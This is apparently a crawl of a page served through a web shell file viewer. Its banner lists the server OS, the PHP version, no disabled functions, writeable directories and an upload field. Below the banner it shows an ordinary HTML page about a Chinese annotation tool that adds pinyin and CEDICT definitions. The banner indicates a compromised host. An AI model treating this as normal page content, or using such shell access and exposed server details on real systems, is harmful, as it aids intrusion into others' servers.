KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/mandarintools/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/mandarintools/annotate.html
<HTML>
<HEAD>
<META name="description" content="Annotate Chinese Text with pronunciation and English definitions">
<META name="keywords" content="Chinese, perl, tools, GB, romanization, pinyin, annotate, English, learn, read, study, guide"> 

<TITLE>Chinese Annotation Tool</TITLE>
</HEAD>
<BODY BGCOLOR=LIGHTYELLOW>
<CENTER><H2>Chinese Annotation Tool</H2></CENTER>

<STRONG>My annotator can no longer run on the server that was hosting
it, so unfortunately it is currently unavailable.  If someone has
extra server space and power (the annotator can be computationally
intensive) to set up a mirror for the annotator, please let <A
HREF="mailto:[email protected]"> me know</A>.  You can download
the <A HREF="http://www.mandarintools.com/download/annotator.tar.gz">
necessary files</A> to run your own mirror site. Read the included
README.txt file.  You can also use a similar <A
HREF="http://www.all-day-breakfast.com/chinese/big5-simple.html">annotator
for Big5-encoded text</A> or <A
href="http://www.waiyu.org">Waiyu.org's</A> GB and Big5 annotation
server.  Also see <A HREF="http://www.rikai.com/perl/HomePage.pl?Language=Zh">Rikai</A> and <A HREF="http://www.adsotrans.com/">Adso</A>.  To those people who have found the annotator useful, I am
sorry that it is temporarily unusable.</STRONG>

<H2>Mirrors</H2>
<UL>
<LI><A HREF="http://www-rohan.sdsu.edu/~chinese/annotate.html">Zhang Zheng-sheng's SDSU Mirror</A>
<LI><A HREF="http://www.andante.org/annotate.html">Andante.org's Mirror</A>
</UL>

<!--
<FORM METHOD=POST ACTION="http://epsilon3.georgetown.edu/~petersee/cgi-bin/annotate.cgi">
<CENTER>

<h3>Text or Web Page to Annotate</h3>
<TEXTAREA NAME="ctext" ROWS=12 COLS=80 WRAP="physical">
http://www.voa.gov/chinese/newsfocus/news/newsinbrief.htm
</TEXTAREA>
<P>

<strong>Words to Annotate:</strong> <BR>
<TEXTAREA NAME="words" ROWS=4 COLS = 80 WRAP="physical">
</TEXTAREA>
<BR>
<INPUT TYPE=SUBMIT VALUE="Annotate!">
<SELECT NAME="atype">
<OPTION VALUE="segment">Segment Only
<OPTION VALUE="adddict">Add Dictionary Entries as footnotes
<OPTION SELECTED VALUE="js_adddict">Add Dictionary Entries at status line
<OPTION VALUE="topinyin">Convert to Pinyin
<OPTION VALUE="addpinyin">Add Pinyin Next to Characters
<OPTION VALUE="addruby">Add Pinyin Above Characters (IE5 Only)
<OPTION VALUE="addmargin">Add Pinyin/Definitions in Right Margin
</SELECT>
</CENTER>
</FORM> -->
<HR width=800>
   This tool makes learning to read Chinese easier by automatically
marking up the words in a simplified Chinese text with their
pronunciations and dictionary definitions.  You can type or paste in
GB-encoded text or the address of a Chinese web page.  You have
several choices of how the text will be annotated:

<OL>
 <LI><STRONG>Segment Only</STRONG>: In this option, the program will
add spaces between the words in the text.  No other information is
added.

 <LI><STRONG>Add Dictionary Entries at status line</STRONG>: After
segmenting the text, the program adds two kinds of ways of looking up
the word.  First, when the user puts the mouse over an underlined
word, its pronounciation and definition will appear at the bottom of
the browser, at the status line.  If the user actually clicks on the
underlined word, it will take them to the pronounciation and English
definition as a footnote later on in the page.

<LI><STRONG>Add Dictionary Entries as footnotes</STRONG>: This option
is for users with older browsers that do not understand JavaScript.
Holding the mouse over a word will do nothing, but clicking it on will
still take the user to the definition in the footnotes.  The file size
is also smaller than option 2.

 <LI><STRONG>Convert to Pinyin</STRONG>: The program segments the text
and uses that information to convert the Chinese characters to pinyin.
Only the pinyin is shown in the results.

 <LI><STRONG>Add pinyin next to characters</StRONG>: The
pronounciation of each character is indicated by adding pinyin by its
side.  No other information is added.

 <LI><B>Add Pinyin above Characters</B>: Add the pinyin above the
character, in an annotation style called the ruby.  Currently only
works on Internet Explorer 5 (for other browsers the pinyin is placed
next to the character).

 <LI><STRONG>Add Pinyin/Defs in Margins</STRONG>: Type a list of words
into "Words to Annotate" box, one word per line with no spaces.
Annotator will add definitions of these words to the right of the
paragraph the words occur in.  If the words are not in the dictionary,
you can also include the definition besides the word, using the format
described below.

</OL>
<P>
User can add or override definitions in the "Words to Annotate"
section by using this format:
<P>
Chinese [pinyin] /English definition/
<P>
That is, the Chinese (no internal spaces), followed by one space (not
a wide Chinese space), followed by the pinyin surrounded by square
brackets (with a space between each pinyin syllable), followed by
another space, followed the English definition/explanation surrounded
by slashes (this is the CEDict format).  One word or definition per
line.
<P>
   Users can use this to override the CEDict definitions in the other
modes if the definitions or romanizations have mistakes.
<P>
  When using "Add to Margins" the first time the word occurs it will
be in bold.  Its definition will appear more or less to its right.
Right now it is set up to try match words to paragraphs, so be sure to
have at least one blank line between paragraphs.

<P>
   Click <A HREF="annotate_sample.html">here</A> for an already
annotated sample text.
<P>
   The tool currently only handles GB-encoded text.  Dictionary
definitions are drawn from Paul Denisowski's <A
HREF="http://www.mandarintools.com/cedict.html"
target="_top"> CEDICT</A> Chinese-English dictionary.  If you find a
word that does not have a definition, consider contributing it to the
CEDICT project.  The segmentation algorithm is still under
development.  Just what constitutes a "proper" Chinese word is also a
good research topic.  I will include my own guidelines at a later
date.  You can <A HREF="segmenter.html">download the segmenter
code</A> (in perl) and run it yourself.  You can also look up entries
in CEDICT from my <A HREF="worddict.html">Chinese-English
dictionary</A> page.
<P>
Please visit my <A HREF="contact.html">guestbook</A> to tell me you
comments and suggestions for this tool.  If you came to this page
directly, you might also enjoy visiting some of my other <A
HREF="http://www.mandarintools.com" target="_top">On-line Chinese
Tools</A>.

</BODY>
</HTML>

Anon7 - 2021